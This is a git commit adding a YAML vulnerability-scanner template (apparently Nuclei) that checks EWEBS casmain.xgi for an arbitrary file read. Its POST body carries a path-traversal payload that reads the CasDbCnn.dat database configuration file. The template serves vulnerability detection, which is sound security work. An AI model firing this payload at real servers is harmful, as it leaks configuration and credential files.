Merge pull request #2384 from pikpikcu/patch-251

Create ewebs-arbitrary-file-reading
2021-08-12 18:20:15 +05:30 · 2021-08-12 18:20:15 +05:30 · ef027f6dca
parent 29d78b11b5 df65ba694b
commit ef027f6dca
1 changed files with 30 additions and 0 deletions
--- a/vulnerabilities/other/ewebs-arbitrary-file-reading.yaml
+++ b/vulnerabilities/other/ewebs-arbitrary-file-reading.yaml
@ -0,0 +1,30 @@
+id: ewebs-arbitrary-file-reading
+
+info:
+  name: EWEBS casmain.xgi arbitrary file reading vulnerability
+  author: pikpikcu
+  severity: high
+  reference: http://wiki.peiqi.tech/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E6%9E%81%E9%80%9AEWEBS/%E6%9E%81%E9%80%9AEWEBS%20casmain.xgi%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html
+  tags: ewebs,lfi
+
+requests:
+  - method: POST
+    path:
+      - '{{BaseURL}}/casmain.xgi'
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+
+    body: "Language_S=../../Data/CONFIG/CasDbCnn.dat"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "[Edition]"
+          - "[LocalInfo]"
+        condition: and
+        part: body
+
+      - type: status
+        status:
+          - 200